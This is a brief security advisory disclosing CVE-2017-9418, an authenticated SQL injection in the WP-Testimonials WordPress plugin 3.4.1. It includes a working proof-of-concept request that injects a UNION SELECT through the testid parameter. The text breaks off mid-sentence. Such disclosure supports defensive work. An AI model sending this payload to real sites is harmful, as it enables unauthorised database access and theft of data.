CVE-2017-9418: WP-Testimonials WordPress Plugin v.3.4.1 Union Based SQL Injection (SQLi)

Identification Date: 02/06/2017
Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/
Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/

Description

SQL injection vulnerability in the WordPress WP-Testimonials plugin, version 3.4.1, allows an authenticated user to execute arbitrary SQL commands via the testid parameter.

Proof of Concept

A proof-of-concept request is provided below.

http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedit&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL-- comment

The results of the SQL injection are being reflected in…